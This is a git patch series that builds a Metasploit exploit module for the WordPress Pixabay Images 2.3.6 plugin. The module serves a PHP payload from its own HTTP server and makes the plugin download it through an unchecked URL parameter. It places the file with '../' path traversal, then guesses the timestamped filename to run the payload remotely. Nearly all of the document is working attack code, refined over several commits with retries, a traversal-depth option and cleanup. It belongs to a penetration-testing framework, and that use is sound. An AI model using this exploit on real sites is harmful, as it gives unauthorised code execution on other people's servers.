From 5813c639d15fe130f2b44e56960304d1cfb9c675 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?= Date: Mon, 19 Jan 2015 17:23:48 +0100 Subject: [PATCH 1/9] Initial commit --- .../webapp/php_wordpress_pixabay_images.rb | 159 ++++++++++++++++++ 1 file changed, 159 insertions(+) create mode 100644 modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb new file mode 100644 index 0000000000..691711178c --- /dev/null +++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb @@ -0,0 +1,159 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class Metasploit3 < Msf::Exploit::Remote + include Msf::HTTP::Wordpress + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + Rank = ExcellentRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wordpress Pixabay Images PHP Code Upload', + 'Description' => %q{ + This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay + Images 2.3.6. The plugin does not check the host of a provided download URL + which can be used to store and execute malicious PHP code on the system. + }, + + 'Author' => + [ + 'h0ng10', # Discovery, Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [['pixabay-images 2.3', {}]], + 'DefaultTarget' => 0, + 'Payload' => + { + 'DisableNops' => true, + }, + 'DisclosureDate' => 'Jan 19 2015' + )) + + register_options( + [ + OptString.new('DOWNURI', [ false, "An alternative URI to request the PHP payload from"]), + ], self.class) + + end + + + # Handle incoming requests from the server + def on_request_uri(cli, request) + vprint_status("#{rhost}:#{rport} - URI requested: #{request.inspect}") + print_status("#{rhost}:#{rport} - Sending the payload to the server...") + send_response(cli, payload.encoded) + end + + def generate_payload_uri + + # Did the user provide his own url? If yes use it... + return datastore['DOWNURI'] if datastore['DOWNURI'] + + # Create a custom URI + custom_uri = "http://" + datastore['SRVHOST'] + + if datastore['SRVPORT'] != "80" then + custom_uri += ":" + datastore['SRVPORT'].to_s + end + + custom_uri += normalize_uri(get_resource.chomp('/')) + ".php" + return custom_uri + end + + + def call_payload(file_name, epoch_time) + real_fn = "#{file_name}_#{epoch_time.to_s}.php" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn), + }) + return res + end + + def exploit + unless wordpress_and_online? + fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site") + end + + + print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...") + start_service + + # did the user provide his own url + payload_uri = generate_payload_uri + vprint_status("Using URI " + payload_uri) + + random_file_name = rand_text_alphanumeric(rand(5)+5) + post = { + 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), + 'image_url' => payload_uri, + 'image_user' => rand_text_alphanumeric(rand(5)+5), + 'q' => "../../../../" + random_file_name + } + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'wp-admin/'), + 'vars_post' => post, + }) + + server_epoch_time = DateTime.strptime(res.headers['date'], "%a, %d %b %Y %H:%M:%S GMT").to_i + + print_status("Calling payload") + res = call_payload(random_file_name, server_epoch_time) + + if (res and res.code != 200) then + print_status("Request failed, trying additional epoch values...") + server_epoch_time -= 5 + 10.times do |i| + res = call_payload(random_file_name, server_epoch_time) + break if res and res.code == 200 + server_epoch_time += 1 + end + end + stop_service + + end + + def check + res = wordpress_and_online? + unless res + vprint_error("#{peer} does not seeem to be Wordpress site") + return Exploit::CheckCode::Unknown + end + + # Send a request with a illegal URL to verify that the target is vulnerable + post = { + 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), + 'image_url' => rand_text_alphanumeric(rand(5)+5), + 'image_user' => rand_text_alphanumeric(rand(5)+5), + 'q' => rand_text_alphanumeric(rand(5)+5) + } + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'wp-admin/'), + 'vars_post' => post, + }) + + + if res.body and (res.body =~ /Error: A valid URL was not provided/) + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + + end +end From 11bf58e5485b2b77d6dc82af64321da21b48f684 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?= Date: Fri, 23 Jan 2015 08:48:52 +0100 Subject: [PATCH 2/9] Use metasploit methods --- .../webapp/php_wordpress_pixabay_images.rb | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb index 691711178c..3157050043 100644 --- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb +++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb @@ -62,13 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote return datastore['DOWNURI'] if datastore['DOWNURI'] # Create a custom URI - custom_uri = "http://" + datastore['SRVHOST'] - - if datastore['SRVPORT'] != "80" then - custom_uri += ":" + datastore['SRVPORT'].to_s - end - - custom_uri += normalize_uri(get_resource.chomp('/')) + ".php" + custom_uri = get_uri + ".php" return custom_uri end @@ -77,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote real_fn = "#{file_name}_#{epoch_time.to_s}.php" res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn), + 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn), }) return res end @@ -87,8 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site") end - - print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...") + print_status("Starting up web service...") start_service # did the user provide his own url @@ -105,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'wp-admin/'), + 'uri' => normalize_uri(wordpress_url_backend), 'vars_post' => post, }) @@ -144,12 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'wp-admin/'), + 'uri' => normalize_uri(wordpress_url_backend), 'vars_post' => post, }) - if res.body and (res.body =~ /Error: A valid URL was not provided/) + if res and (res.body =~ /Error: A valid URL was not provided/) return Exploit::CheckCode::Vulnerable end From dfbbc79e0d5f3adeff2abaf9d2de70bb7bf02708 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?= Date: Fri, 23 Jan 2015 09:23:09 +0100 Subject: [PATCH 3/9] make retries a datastore option --- modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb index 3157050043..dad4eeacb6 100644 --- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb +++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb @@ -43,6 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ + OptInt.new('RETRIES', [ false, 'Number of guesses if initial name guess fails', 5]), OptString.new('DOWNURI', [ false, "An alternative URI to request the PHP payload from"]), ], self.class) @@ -109,8 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.code != 200) then print_status("Request failed, trying additional epoch values...") - server_epoch_time -= 5 - 10.times do |i| + datastore['RETRIES'].times do |i| res = call_payload(random_file_name, server_epoch_time) break if res and res.code == 200 server_epoch_time += 1 From 419fa93897d75f6801f01bc21b92d9de0c7b8489 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?= Date: Fri, 23 Jan 2015 09:27:42 +0100 Subject: [PATCH 4/9] Add OSVDB and WPScan references --- modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb index dad4eeacb6..f3159ffd49 100644 --- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb +++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb @@ -27,7 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ] + [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ], + [ 'OSVDB', '117145' ], + [ 'OSVDB', '117146'], + [ 'WPVDB', '7758'] ], 'Privileged' => false, 'Platform' => ['php'], From 82be43ea58da55d71234bf82499e2c06f411a3df Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 3 Feb 2015 16:07:27 -0600 Subject: [PATCH 5/9] Do minor cleanup --- .../webapp/php_wordpress_pixabay_images.rb | 113 ++++++++---------- 1 file changed, 52 insertions(+), 61 deletions(-) diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb index f3159ffd49..2030dc1978 100644 --- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb +++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb @@ -15,11 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Wordpress Pixabay Images PHP Code Upload', 'Description' => %q{ - This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay - Images 2.3.6. The plugin does not check the host of a provided download URL - which can be used to store and execute malicious PHP code on the system. + This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay + Images 2.3.6. The plugin does not check the host of a provided download URL + which can be used to store and execute malicious PHP code on the system. }, - 'Author' => [ 'h0ng10', # Discovery, Metasploit module @@ -27,10 +26,10 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ], - [ 'OSVDB', '117145' ], - [ 'OSVDB', '117146'], - [ 'WPVDB', '7758'] + ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt'], + ['OSVDB', '117145'], + ['OSVDB', '117146'], + ['WPVDB', '7758'] ], 'Privileged' => false, 'Platform' => ['php'], @@ -41,15 +40,14 @@ class Metasploit3 < Msf::Exploit::Remote { 'DisableNops' => true, }, + 'Stance' => Msf::Exploit::Stance::Aggressive, 'DisclosureDate' => 'Jan 19 2015' - )) - - register_options( - [ - OptInt.new('RETRIES', [ false, 'Number of guesses if initial name guess fails', 5]), - OptString.new('DOWNURI', [ false, "An alternative URI to request the PHP payload from"]), - ], self.class) + )) + register_options( + [ + OptInt.new('RETRIES', [false, 'Number of guesses if initial name guess fails', 5]) + ], self.class) end @@ -61,95 +59,88 @@ class Metasploit3 < Msf::Exploit::Remote end def generate_payload_uri - - # Did the user provide his own url? If yes use it... - return datastore['DOWNURI'] if datastore['DOWNURI'] - # Create a custom URI - custom_uri = get_uri + ".php" - return custom_uri + "#{get_uri}.php" end - def call_payload(file_name, epoch_time) - real_fn = "#{file_name}_#{epoch_time.to_s}.php" - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn), - }) - return res + real_fn = "#{file_name}_#{epoch_time.to_s}.php" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn), + }) + + res end def exploit unless wordpress_and_online? - fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site") + fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be Wordpress site") end - print_status("Starting up web service...") + print_status("#{peer} - Starting up web service...") start_service # did the user provide his own url payload_uri = generate_payload_uri - vprint_status("Using URI " + payload_uri) + vprint_status("#{peer} - Using URI #{payload_uri}") random_file_name = rand_text_alphanumeric(rand(5)+5) post = { - 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), - 'image_url' => payload_uri, - 'image_user' => rand_text_alphanumeric(rand(5)+5), - 'q' => "../../../../" + random_file_name + 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), + 'image_url' => payload_uri, + 'image_user' => rand_text_alphanumeric(rand(5)+5), + 'q' => "../../../../" + random_file_name } res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(wordpress_url_backend), - 'vars_post' => post, - }) + 'method' => 'POST', + 'uri' => normalize_uri(wordpress_url_backend), + 'vars_post' => post + }) - server_epoch_time = DateTime.strptime(res.headers['date'], "%a, %d %b %Y %H:%M:%S GMT").to_i + server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i - print_status("Calling payload") + print_status("#{peer} - Calling payload...") res = call_payload(random_file_name, server_epoch_time) - if (res and res.code != 200) then - print_status("Request failed, trying additional epoch values...") - datastore['RETRIES'].times do |i| - res = call_payload(random_file_name, server_epoch_time) - break if res and res.code == 200 - server_epoch_time += 1 - end + if res and res.code != 200 + print_status("#{peer} - Request failed, trying additional epoch values...") + datastore['RETRIES'].times do |i| + res = call_payload(random_file_name, server_epoch_time) + break if res and res.code == 200 + server_epoch_time += 1 + end end stop_service - end def check res = wordpress_and_online? unless res - vprint_error("#{peer} does not seeem to be Wordpress site") + vprint_error("#{peer} - It doesn't look like a Wordpress site") return Exploit::CheckCode::Unknown end # Send a request with a illegal URL to verify that the target is vulnerable post = { - 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), - 'image_url' => rand_text_alphanumeric(rand(5)+5), - 'image_user' => rand_text_alphanumeric(rand(5)+5), - 'q' => rand_text_alphanumeric(rand(5)+5) + 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), + 'image_url' => rand_text_alphanumeric(rand(5)+5), + 'image_user' => rand_text_alphanumeric(rand(5)+5), + 'q' => rand_text_alphanumeric(rand(5)+5) } res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(wordpress_url_backend), - 'vars_post' => post, - }) + 'method' => 'POST', + 'uri' => normalize_uri(wordpress_url_backend), + 'vars_post' => post + }) - if res and (res.body =~ /Error: A valid URL was not provided/) + if res && res.body && res.body.to_s =~ /Error: A valid URL was not provided/ return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Safe - + Exploit::CheckCode::Safe end end From 61cdb5dfc9d79e32e1b12e8c999d8cd2a7f97032 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 3 Feb 2015 16:13:10 -0600 Subject: [PATCH 6/9] Change filename --- ...hp_wordpress_pixabay_images.rb => wp_pixabay_images_upload.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/unix/webapp/{php_wordpress_pixabay_images.rb => wp_pixabay_images_upload.rb} (100%) diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb similarity index 100% rename from modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb rename to modules/exploits/unix/webapp/wp_pixabay_images_upload.rb From e62a5a4fffb5cf7bc2c1a56254d2369299864f3f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 3 Feb 2015 16:23:04 -0600 Subject: [PATCH 7/9] Make the calling payload code easier --- .../unix/webapp/wp_pixabay_images_upload.rb | 24 +++++++------------ 1 file changed, 9 insertions(+), 15 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 2030dc1978..374950c8bc 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -46,15 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptInt.new('RETRIES', [false, 'Number of guesses if initial name guess fails', 5]) + OptInt.new('TRIES', [false, 'Number of guesses if initial name guess fails', 5]) ], self.class) end # Handle incoming requests from the server def on_request_uri(cli, request) - vprint_status("#{rhost}:#{rport} - URI requested: #{request.inspect}") - print_status("#{rhost}:#{rport} - Sending the payload to the server...") + print_status("URI requested: #{request.raw_uri}") send_response(cli, payload.encoded) end @@ -67,8 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote real_fn = "#{file_name}_#{epoch_time.to_s}.php" res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn), - }) + 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn) + }, 3) res end @@ -99,20 +98,15 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => post }) + stop_service + server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i print_status("#{peer} - Calling payload...") - res = call_payload(random_file_name, server_epoch_time) - - if res and res.code != 200 - print_status("#{peer} - Request failed, trying additional epoch values...") - datastore['RETRIES'].times do |i| - res = call_payload(random_file_name, server_epoch_time) - break if res and res.code == 200 - server_epoch_time += 1 - end + datastore['TRIES'].times do |i| + res = call_payload(random_file_name, server_epoch_time + i) + break if res and res.code == 200 end - stop_service end def check From 4ca4fd1be26c73ae0aacf994b555b8e8f8962eaf Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 3 Feb 2015 16:38:40 -0600 Subject: [PATCH 8/9] Allow to provide the traversal depth --- .../unix/webapp/wp_pixabay_images_upload.rb | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 374950c8bc..96d3bc1555 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -46,7 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptInt.new('TRIES', [false, 'Number of guesses if initial name guess fails', 5]) + OptInt.new('TRIES', [true, 'Number of guesses if initial name guess fails', 5]), + OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 3]) ], self.class) end @@ -57,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote send_response(cli, payload.encoded) end + # Create a custom URI def generate_payload_uri - # Create a custom URI "#{get_uri}.php" end @@ -80,18 +81,18 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Starting up web service...") start_service - # did the user provide his own url payload_uri = generate_payload_uri vprint_status("#{peer} - Using URI #{payload_uri}") - random_file_name = rand_text_alphanumeric(rand(5)+5) + random_file_name = rand_text_alphanumeric(rand(5) + 5) post = { - 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), + 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5), 'image_url' => payload_uri, - 'image_user' => rand_text_alphanumeric(rand(5)+5), - 'q' => "../../../../" + random_file_name + 'image_user' => rand_text_alphanumeric(rand(5) + 5), + 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" } + print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend), @@ -100,6 +101,10 @@ class Metasploit3 < Msf::Exploit::Remote stop_service + unless res && res.code == 200 && res.headers['date'] + fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...") + end + server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i print_status("#{peer} - Calling payload...") @@ -118,10 +123,10 @@ class Metasploit3 < Msf::Exploit::Remote # Send a request with a illegal URL to verify that the target is vulnerable post = { - 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5), - 'image_url' => rand_text_alphanumeric(rand(5)+5), - 'image_user' => rand_text_alphanumeric(rand(5)+5), - 'q' => rand_text_alphanumeric(rand(5)+5) + 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5), + 'image_url' => rand_text_alphanumeric(rand(5) + 5), + 'image_user' => rand_text_alphanumeric(rand(5) + 5), + 'q' => rand_text_alphanumeric(rand(5) + 5) } res = send_request_cgi({ @@ -130,7 +135,6 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => post }) - if res && res.body && res.body.to_s =~ /Error: A valid URL was not provided/ return Exploit::CheckCode::Vulnerable end From eebee7c066c28d97f79156e48ff7762eb3c3d5cd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 3 Feb 2015 17:00:37 -0600 Subject: [PATCH 9/9] Do better session creation handling --- .../unix/webapp/wp_pixabay_images_upload.rb | 21 +++++++++++-------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 96d3bc1555..7c90695230 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -4,10 +4,10 @@ ## class Metasploit3 < Msf::Exploit::Remote - include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::FileDropper + include Msf::HTTP::Wordpress Rank = ExcellentRanking @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ OptInt.new('TRIES', [true, 'Number of guesses if initial name guess fails', 5]), - OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 3]) + OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 4]) ], self.class) end @@ -63,11 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote "#{get_uri}.php" end - def call_payload(file_name, epoch_time) - real_fn = "#{file_name}_#{epoch_time.to_s}.php" + def call_payload(file_name) res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn) + 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', file_name) }, 3) res @@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" } - print_status("#{peer} - Uploading payload...") + print_status("#{peer} - Uploading payload #{random_file_name}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend), @@ -109,8 +108,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Calling payload...") datastore['TRIES'].times do |i| - res = call_payload(random_file_name, server_epoch_time + i) - break if res and res.code == 200 + payload_name = "#{random_file_name}_#{server_epoch_time + i}.php" + res = call_payload(payload_name) + if (res && res.code == 200) || session_created? + register_files_for_cleanup(payload_name) + break + end end end